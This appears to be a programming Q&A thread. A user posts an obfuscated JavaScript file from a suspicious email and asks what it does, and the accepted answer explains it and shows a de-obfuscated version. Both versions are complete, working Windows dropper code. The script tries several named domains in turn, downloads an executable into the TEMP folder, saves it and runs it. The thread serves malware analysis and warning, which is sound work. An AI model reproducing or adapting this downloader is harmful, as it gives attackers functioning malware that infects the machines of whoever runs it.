# What is this script supposed to do?

Tags: javascript

I just got a sketchy email to my University email. There was a zipped folder, containing, a lone js file. It reads:

```
var c54='sa',l88='vir',t3='(9',s19='ipt.C',f89='e();',t33='acosm',z63='80996',y15='"/',b33='e >',p16='.c',s39='613"',t13='xo.o',y88=' (e',e57=' = ',m27='nseBo',d96='ateOb',w63='); v',s68='i; ',i14='siz',l48='ntS',h9='ndEn',b26='secag',m36='<=3; ',i76='if (x',j3='r) { ',c83=' { va',e85='ET"',i42='pi',k39=' xo =',k23='var',u3='te(',y11=' WSc',m93=']+',r36='break',a66='xa.',y80=' }; ',g89='lad',c5='d=5',p0=' fal',u62='o.sta',o43='it',d98='= 20',f0='ar w',p81='"+n,',b47='at',o85='com',o52='ng',t93='.in',l14='ri',z84=' (er)',k21='er/?i',m44=' tr',e24=' xa.',e76='Shel',i94='); va',j30='i<',n26='fo"',p23=' x',a99='spo',k12='ToFi',z47='l',l78='2)',x8=',"htt',d81='ateO',q90=' 1) ',w44='ar',f41='}; };',c65='liar',p54='0)',c75='s.',b48='0;',r66=' fn =',i12='(); ',a34=' ws.E',o35=' };',e11='gs("',e49='r xa',b39=' xa.c',l26='ar l',p94='= ',b50='pos',z83='l")',w1='l.ne',q41='+"116',a36='ler',a6='ream"',f43='ipt.C',d14='if (d',w84='a.',j93=' WScr',h67='n = ',x77='var n',j58='.re',g40=' ws.',c32='eva',t42='n = 0',b99='me',t16='nd',u72='St',w45='ope',m28='m va',p29='; ',s74='DODB.',m68='{ ',x27=' }',h47='%TE',q27=' 100',w90='le(fn',x1='ML',p75='jec',a96='tus =',u40='+".',j31='.spl',c32=c32+z47,d94='var b'+' = "m'+'ahar'+t33+'etic'+c75+o85+' al'+i42+'na'+'texti'+w1+'t pra'+'vda'+'club'+p16+'om s'+'cuo'+g89+'ii'+o52+'le'+b26+c65+'i.co'+m28+a36+'y-art'+t93+n26+j31+o43+'(" "'+'); v'+f0+'s ='+j93+f43+'re'+d96+'ject'+'("WSc'+'ript.'+e76+z83+'; v'+w44+r66+a34+'xpa'+h9+l88+'on'+b99+l48+'trin'+e11+h47+'MP%"'+')+S'+'tr'+'ing.'+'fr'+'omCha'+'rCode'+t3+l78+q41+s39+p29+k23+k39+y11+'ript.'+'Cre'+'ateOb'+p75+'t("'+'MSX'+x1+'2.XM'+'LH'+'TTP"'+i94+e49+' = W'+'Scr'+s19+'re'+d81+'bj'+'ect('+'"A'+s74+u72+a6+w63+l26+'d ='+' 0; f'+'or ('+x77+'=1; n'+m36+'n++'+') '+'{ '+'for'+' (var'+' i='+'ld; '+j30+'b.le'+'ng'+'th;'+' i++)'+c83+'r d'+t42+'; tr'+'y '+m68+t13+'pen'+'("G'+e85+x8+'p://'+'"+b[i'+m93+y15+'co'+'unt'+k21+'d=rXMZC-yveCATYKjjCS2c-d6-5IwJfqv8fhNtqQ8Rm1fG43mc2Br1yQmPZ4Nji-Qri382AmpsdkoNWyNWbEJAPQAY0i3a'+'&rn'+c5+z63+p81+p0+'se'+'); '+'xo.se'+t16+i12+i76+u62+a96+d98+'0) '+'{ xa.'+w45+'n();'+' xa.t'+'ype '+'= 1;'+' xa.w'+l14+u3+'xo'+j58+a99+m27+'dy);'+' i'+'f ('+a66+i14+b33+q27+p54+' { d'+h67+'1;'+p23+w84+b50+'iti'+'on'+e57+b48+e24+c54+'ve'+k12+w90+'+n'+u40+'exe'+'",2);'+m44+'y {'+g40+'Run('+'fn+'+'n+".'+'exe"'+',1,0'+');'+' } ca'+'tch'+z84+' { };'+o35+b39+'los'+f89+y80+d14+'n =='+q90+'{ ld '+p94+s68+r36+'; };'+x27+' c'+b47+'ch'+y88+j3+f41+' };',o79=this[c32];o79(d94);
```

Can someone tell me what this script is trying to accomplish?

Answer (score 8, accepted):

The code will attempt to download and execute malware.

Here is the de-obfuscated code, which was put together [here](http://deobfuscatejavascript.com).

```
var b = "maharacosmetics.com alpinatextil.net pravdaclub.com scuoladiinglesecagliari.com valery-art.info".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "116613";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i < b.length; i++) {
        var dn = 0;
        try {
            xo.open("GET", "http://" + b[i] + "/counter/?id=rXMZC-yveCATYKjjCS2c-d6-5IwJfqv8fhNtqQ8Rm1fG43mc2Br1yQmPZ4Nji-Qri382AmpsdkoNWyNWbEJAPQAY0i3a&rnd=580996" + n, false);
            xo.send();
            if (xo.status == 200) {
                xa.open();
                xa.type = 1;
                xa.write(xo.responseBody);
                if (xa.size > 1000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);
                    } catch (er) {};
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i;
                break;
            };
        } catch (er) {};
    };
};
```